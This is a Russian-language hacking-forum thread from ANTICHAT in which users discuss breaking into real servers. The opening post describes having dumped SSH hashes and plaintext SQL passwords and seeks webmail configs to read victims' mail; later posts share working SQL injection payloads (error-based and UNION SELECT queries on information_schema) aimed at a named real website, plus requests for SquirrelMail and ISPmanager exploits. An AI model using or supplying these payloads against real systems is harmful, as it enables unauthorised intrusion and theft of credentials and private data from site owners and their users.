HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.04.2015, 15:45
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами: 7231286

Репутация: 0
По умолчанию

Есть доступ ко всем файлам на сервере, вытащила ssh хэши, пароли SQL в чистом виде. в общем, это здорово, но мне нужен доступ к их почтам. Не подскажете, где могут быть конфиги?

EDIT: они юзают horde webmail=>/etc/psa/.webmail.shadow верно? Но этот файл закрыт на чтение root only FUCK. Неужели нет никаких более способов? Неужели я потратила целый день за зря ? ну таааааааааааааак обидно, сил нет
 
Ответить с цитированием

  #2  
Старый 17.04.2015, 20:16
xxl
Новичок
Регистрация: 22.11.2012
Сообщений: 21
С нами: 7090166

Репутация: 0
По умолчанию

SquirrelMail 1.4.21 - есть ли уязвимости? Погуглил - информация о наличии уязвимостей есть,но нет эксплойтов...

+ ISPmanager v4 lite. Есть ли что-то? (кроме открытой передачи пароля в API)
 
Ответить с цитированием

  #3  
Старый 18.04.2015, 22:18
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами: 8128406

Репутация: -2
По умолчанию

 
Ответить с цитированием

  #4  
Старый 19.04.2015, 02:32
xxl
Новичок
Регистрация: 22.11.2012
Сообщений: 21
С нами: 7090166

Репутация: 0
По умолчанию

Цитата:
Сообщение от teh  
http://www.techexpo.kiev.ua/info_page.php?id=-37 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) - версия БД.

(

это если ручками хочешь перебирать,а так:

sqlmap сказал,что

[WARNING] no table(s) found.

Но он пиздит 100%,там самому надо перебирать(SELECT table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'DB')

)
 
Ответить с цитированием

  #5  
Старый 19.04.2015, 07:32
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от teh  
Там нету такой таблицы

http://www.techexpo.kiev.ua/info_pa...656562636e65745f746563686578706f--+k&sub_id=1

eebc.cms_users
 
Ответить с цитированием

  #6  
Старый 19.04.2015, 20:20
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами: 8128406

Репутация: -2
По умолчанию

http://www.techexpo.kiev.ua/info_pa...e,4 from information_schema.tables--&sub_id=1

но, information_schema показывает что она существует
 
Ответить с цитированием

  #7  
Старый 19.04.2015, 21:52
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от teh  

http://www.techexpo.kiev.ua/info_page.php?id=-37 union select 1,2,table_name,4 from information_schema.tables--&sub_id=1
но, information_schema показывает что она существует
таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where
 
Ответить с цитированием

  #8  
Старый 20.04.2015, 01:33
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами: 8128406

Репутация: -2
По умолчанию

Цитата:
Сообщение от faza02  

таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where
спасибо, понял
 
Ответить с цитированием

  #9  
Старый 20.04.2015, 12:42
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от xxl  


можно ли раскрутить самому? и как
xxl , если хотите, чтобы Вам помогли, то нужно задавать корректный и внятный вопрос, а еще лучше, опубликовать ссылку на язвимый сайт. Читайте правила! Если не отредактируете, пост будет удален.
 
Ответить с цитированием

  #10  
Старый 20.04.2015, 16:45
sunnyfruit
Новичок
Регистрация: 08.05.2013
Сообщений: 16
С нами: 6849686

Репутация: 0
По умолчанию

 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.